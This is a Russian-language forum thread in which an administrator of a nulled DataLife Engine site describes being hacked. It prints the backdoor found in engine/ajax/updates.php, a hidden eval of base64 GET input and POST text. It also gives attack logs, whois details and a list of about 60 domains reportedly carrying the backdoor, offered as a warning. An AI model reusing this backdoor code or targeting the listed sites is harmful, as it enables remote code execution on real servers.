Инфо Бэкдор в нуле (dle.in.ua)

Тема в разделе "DLE", создана пользователем cmyk, 16 окт 2009.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. cmyk

    cmyk Писатель

    Регистр.:
    11 окт 2007
    Сообщения:
    9
    Симпатии:
    18
    Я являюсь администратором сайта на DLE движке (нуленом).
    Сайт был обновлен до версии 8.2
    13 октября наш сайт был взломан человеком из Украины, город Черкассы. Был заменен файл index.php, удален файл .htaccess
    Права на файлы столяи такие, что пользователь от которого apache запускался мог редактировать их.
    Я провел защитные мероприятия, проставил права, запретил доступ и выключил php engine везде где это было возможно. IP атакующего я идентифицировал, но решил выждать следующей атаки чтобы найти дыру через которую он взломал сайт.
    15 октября атака повторилась, но он ничего не смог сделать, т.к. были выставлены корректные права, файлы изменить было не возможно, шелл залить тоже некуда. Видимо из безысходности он очистил конфигурационный файл.
    Я провел анализ атаки, и обнаружил что она произошла через файл engine/ajax/updates.php
    В этом файле был бэкдор. eval() через $_POST
    Код бэкдора
    PHP:
    if($_GET['wert']==''){
    require_once 
    ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
    $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
    @
    header("HTTP/1.0 200 OK");
    @
    header("HTTP/1.1 200 OK");
    @
    header("Cache-Control: no-cache, must-revalidate, max-age=0");
    @
    header("Expires: 0");
    @
    header("Pragma: no-cache");
    @
    header("Content-type: text/css; charset=".$config['charset']);
    $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
    if (!
    strlen($data)) echo $lang['no_update']; else echo $data;
    }else{
    $file=(ROOT_DIR."/engine/classes/mysql.class.php");
    if(
    file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
    $file=(ROOT_DIR."/engine/data/dbconfig.php");
    if(
    file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
    $file=(ROOT_DIR."/engine/data/config.php");
    if(
    file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
    eval(
    base64_decode($_GET['user_id']));
    echo <<<HTML
    <HTML><body><form action="" method="post">
    <center><textarea name="text" rows="10" cols="100"></textarea>
    <br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
    HTML;
    if(
    $_POST['text']!=''){eval(stripcslashes($_POST['text']));
    }}
    Атака была произведена с ip 78.137.24.122
    Код:
    78.137.24.122 - - [15/Oct/2009:18:17:07 +0300] "GET /engine/ajax/updates.php?wert=123 HTTP/1.1" 200 186 "http://cmska-kasper.co.cc/google/wiev_log.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
    78.137.24.122 - - [15/Oct/2009:18:32:13 +0300] "POST /engine/ajax/updates.php?wert=123 HTTP/1.1" 200 1003 "/engine/ajax/updates.php?wert=123" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
    
    Код:
    % Information related to '78.137.0.0 - 78.137.31.255'
    inetnum:        78.137.0.0 - 78.137.31.255
    netname:        MCLAUT
    descr:          For broadband users
    country:        UA
    admin-c:        MCL8-RIPE
    tech-c:         MCL8-RIPE
    status:         ASSIGNED PA
    mnt-by:         MCLAUT-ISP-MNT
    source:         RIPE # Filtered
    person:         Vitaly Laut
    address:        Cherkassy, Ukraine
    address:        Dashkevicha, str. 39
    phone:          + 380 472 36-06-53
    fax-no:         + 380 472 36-16-87
    e-mail:         hostmaster@2upost.com
    nic-hdl:        MCL8-RIPE
    mnt-by:         MCLAUT-ISP-MNT
    source:         RIPE # Filtered
    % Information related to '78.137.0.0/19AS25133'
    route:          78.137.0.0/19
    descr:          Customers networks
    origin:         AS25133
    mnt-by:         MCLAUT-ISP-MNT
    source:         RIPE # Filtered
    
    Этот человек видимо не отличается выдающимися умственными способностями, и в логах моего вэб сервера по рефереру спалил список сайтов с бэкдорами.
    Тут ресурсы, в которых есть этот бэкдор http://cmska-kasper.co.cc/google/wiev_log.php
    Код:
    pulya.net
    easy-warez.net
    svew.net
    soft-best.net
    get-file.net
    soft.or.kz
    warezua.ru
    eto.in.ua
    xalyawa.ru
    softmedia.org.ru
    toosoft.ru
    inetserf.com.ua
    zagruzim.com
    1script.info
    portalchik.com
    portablenews.info
    goldfiles.net
    svwarez.org.ua
    nabiz.in.ua
    greet.su
    oom10.if.ua
    danger-soft.ru
    e-prodigy.ru
    palim.info
    dowmedals.warezona.ru
    warezona.ru
    viagrik.com
    warez-box.ru
    pepeh.org.ua
    vipzone.ws
    xemera.ru
    marketfiles.ru
    maxshot.ru
    34music.ru
    lu4ok.ru
    novostishka.ru
    fallengods.org.ua
    onlineobzor.net
    24film.info
    yourfiles.com.ua
    help-wow.ru
    maskishou.pp.ru
    xxx-warez.ru
    spider13.net
    bombila.net
    kefa.kz
    veteroktur.ru
    noznet.ru
    svwarez.com.ua
    12x21.info
    warezzzportal.ru
    dearfriends.ru
    rity.ru
    shevron.biz
    softscool.ru
    softzona.net.ua
    veselyha.org.ua
    crossfile.ru
    nk-time.com
    uanovosti.info
    seo-max.info
    
    Если вы нашли себя в списке - срочно защищайтесь.
    Движек был скачан с http://dle.in.ua ссылка на дистрибутив http://dle.in.ua/relises/5656-datalife-engine-v.8.2-final-release.html
    Поэтому предупреждаю всех владельцев сайтов, кто скачал DLE с этого ресурса - вы очень рискуете своим сайтом. Его могут взломать также как и мой.
     
    scaby, Paffy, bombersoft и 15 другим нравится это.
  2. Klepach

    Klepach

    Регистр.:
    31 окт 2008
    Сообщения:
    941
    Симпатии:
    250
    Напиши это GauraStyle - он админ dle in ua - пусть уберёт, чтоб другие не попались
     
    dragonstyle нравится это.
  3. Jerry

    Jerry тот самый Учиха

    Регистр.:
    16 апр 2006
    Сообщения:
    1.226
    Симпатии:
    490
    Поэтому правильные люди качают только с проверенных источников.
     
    soot и dragonstyle нравится это.
Статус темы:
Закрыта.